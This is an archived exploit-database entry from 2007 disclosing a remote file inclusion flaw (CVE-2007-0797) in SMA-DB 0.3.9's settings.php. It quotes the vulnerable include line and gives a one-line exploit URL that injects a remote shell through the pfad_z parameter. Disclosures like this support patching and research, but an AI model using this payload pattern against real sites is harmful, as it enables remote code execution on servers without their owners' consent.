SMA-DB <= 0.3.9 settings.php Remote File Inclusion Vulnerability

2007-02-05T00:00:00
ID EDB-ID:3268
Type exploitdb
Reporter ThE dE@Th
Modified 2007-02-05T00:00:00

Description

SMA-DB <= 0.3.9 (settings.php) Remote File Inclusion Vulnerability. CVE-2007-0797. Webapps exploit for php platform

                                        
                                            ********************************************************************************
To ConTacT mE:wWw.Asb-May.net/bb
ScRiPt:-http://people.ee.ethz.ch/~dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots
Discovered By:- ThE dE@Th &lt;&lt;{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}&gt;&gt;
******************************************************************************
Settings.php:-
include_once($pfad_z."scripts/session.php");
********************************************************************************
ExPlOiT:-http://www.Site.com/theme/settings.php?pfad_z=[Shell]
********************************************************************************

# milw0rm.com [2007-02-05]